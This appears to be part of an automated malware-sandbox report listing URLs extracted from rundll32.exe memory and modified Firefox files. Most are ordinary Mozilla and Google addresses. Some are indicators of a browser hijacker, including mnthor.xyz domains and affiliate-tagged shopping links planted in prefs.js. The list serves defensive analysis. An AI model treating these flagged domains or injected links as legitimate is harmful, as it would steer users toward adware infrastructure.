Source: omni.ja.bak.3.dr | String found in binary or memory: https://domain.com/file.js:1:10
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-autopush.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1725918469.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-preprod.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1725918469.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive-staging.corp.google.com/
Source: rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/
Source: omni.ja.bak.3.dr | String found in binary or memory: https://duckduckgo.com/?q=
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox-source-docs.mozilla.org/browser/components/newtab/docs/v2-system-addon/about_home_st
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox-source-docs.mozilla.org/browser/urlbar/telemetry.html
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox-source-docs.mozilla.org/dom/ipc/jsactors.html
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/bestpractices.html#detecting-and-avoiding-synchr
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox.dns.nextdns.io/
Source: omni.ja.bak.3.drString found in binary or memory: https://fpn.firefox.com
Source: omni.ja.bak.3.drString found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: omni.ja.bak.3.drString found in binary or memory: https://github.com/firefox-devtools/debugger/blob/master/assets/panel/prefs.js
Source: omni.ja.bak.3.drString found in binary or memory: https://github.com/mozilla-services/mozilla-pipeline-schemas
Source: omni.ja.bak.3.drString found in binary or memory: https://github.com/mozilla/gcp-ingestion/blob/master/docs/edge.md#postput-request
Source: omni.ja.bak.3.drString found in binary or memory: https://github.com/web-platform-tests/wpt
Source: omni.ja.bak.3.drString found in binary or memory: https://groups.google.com/forum/#
Source: omni.ja.bak.3.drString found in binary or memory: https://html.spec.whatwg.org/multipage/microdata.html#values
Source: omni.ja.bak.3.drString found in binary or memory: https://ideas.mozilla.org/
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: omni.ja.bak.3.drString found in binary or memory: https://install.mozilla.org
Source: omni.ja.bak.3.drString found in binary or memory: https://ipfs.io/ipfs/QmXoypizjW3WknFiJnKLwHCnL72vedxjQkDDP1mXWo6uco/wiki/List_of_Google_domains.html
Source: omni.ja.bak.3.drString found in binary or memory: https://main--perf-html.netlify.app
Source: omni.ja.bak.3.drString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: omni.ja.bak.3.drString found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: rundll32.exe, 00000004.00000003.1665124584.0000000002CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnthor.xyz
Source: rundll32.exe, 00000004.00000003.1665124584.0000000002CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1665124584.0000000002CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnthor.xyzdesktop-notification
Source: rundll32.exe, 00000004.00000003.1665124584.0000000002CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnthor.xyzxyzad.xyz
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/about
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/breach-details/
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/user/preferences
Source: omni.ja.bak.3.drString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: omni.ja.bak.3.drString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: omni.ja.bak.3.drString found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: omni.ja.bak.3.drString found in binary or memory: https://opengraphprotocol.org/)
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.googl
Source: rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsy
Source: omni.ja.bak.3.drString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: omni.ja.bak.3.drString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: omni.ja.bak.3.drString found in binary or memory: https://profile.accounts.firefox.com/v1
Source: omni.ja.bak.3.drString found in binary or memory: https://profiler.firefox.com
Source: rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js8
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsx
Source: omni.ja.bak.3.drString found in binary or memory: https://schema.org
Source: omni.ja.bak.3.drString found in binary or memory: https://schema.org/
Source: omni.ja.bak.3.drString found in binary or memory: https://screenshots.firefox.com
Source: omni.ja.bak.3.drString found in binary or memory: https://search.avast.com/AV752/
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/rev/560b7b1b17/browser/themes/shared/tabs.css#624
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/rev/f40d29a11f2eb4685256b59934e637012ea6fb78/gfx/cairo/cairo/s
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/search?q=search-telemetry-schema.json
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/source/browser/installer/windows/msix/AppxManifest.xml.in.
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/source/browser/installer/windows/nsis/shared.nsh
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: omni.ja.bak.3.drString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: omni.ja.bak.3.drString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: omni.ja.bak.3.drString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: omni.ja.bak.3.drString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691435396.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: rundll32.exe, 00000003.00000003.1666746155.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1666780653.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1666684582.0000000002AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg09W
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691435396.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svgp
Source: omni.ja.bak.3.drString found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: omni.ja.bak.3.drString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: omni.ja.bak.3.drString found in binary or memory: https://stackoverflow.com/a/32724723.
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: omni.ja.bak.3.drString found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: omni.ja.bak.3.drString found in binary or memory: https://topsites.mozilla.com/cid/foo.
Source: omni.ja.bak.3.drString found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: omni.ja.bak.3.drString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: omni.ja.bak.3.drString found in binary or memory: https://truecolors.firefox.com
Source: omni.ja.bak.3.drString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: omni.ja.bak.3.drString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: omni.ja.bak.3.drString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: omni.ja.bak.3.drString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: omni.ja.bak.3.drString found in binary or memory: https://www.foo.com
Source: omni.ja.bak.3.drString found in binary or memory: https://www.foo.com:1234
Source: rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748100105.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748125900.00000000033C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
Source: rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/:
Source: omni.ja.bak.3.drString found in binary or memory: https://www.google.com/?bcutc=sp-004-752
Source: rundll32.exe, 00000004.00000003.1742442383.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748301069.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/?h=6fiz7bk1dli28pjdzprzc2iifgzk4e22xjoo.ja7lk70wr
Source: rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748431003.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748391683.0000000003385000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp, Secure Preferences.3.drString found in binary or memory: https://www.google.com/?h=bq2w5i6ru5np2fu3rd3eltwiyje2l6w8844g.mq7doifak
Source: rundll32.exe, 00000004.00000003.1742442383.0000000002CE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/?h=tyjjeh2ogi3qqdrbygpj96fo04sd8rncm8xt.gg4fdx0u7lease
Source: rundll32.exe, 00000004.00000003.1725949573.0000000002D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/C=
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
Source: rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly8N
Source: rundll32.exe, 00000004.00000003.1725918469.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrao
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: omni.ja.bak.3.drString found in binary or memory: https://www.maps.google.com/a/place
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
